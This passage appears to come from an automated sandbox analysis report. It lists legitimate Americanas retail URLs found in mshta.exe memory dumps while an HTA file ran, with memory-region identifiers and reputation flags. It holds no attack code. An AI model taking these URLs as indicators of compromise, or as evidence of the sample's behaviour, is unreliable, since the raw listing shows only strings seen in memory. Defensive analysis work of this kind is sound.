00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://statics-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508038235.000000000A9E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2omshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                      high
                                                      https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578843377.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_camamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://canaldedenuncias.com.br/universoamericanas/mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502225000.0000000002E69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://www.americanas.com.br/busca/xbox-series-smshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                high
                                                                https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicosmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511563098.000000000BDFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndesmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://cliente.americanas.com.br/minha-contamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                      unknown
                                                                      https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismshta.exe, mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                        high
                                                                        https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                          high
                                                                          https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png)mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menuBpmshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cliente.americanas.com.br/minhamshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depuradormshta.exe, mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png/emshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chavemshta.exe, 00000001.00000003.12511109691.00000000095F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 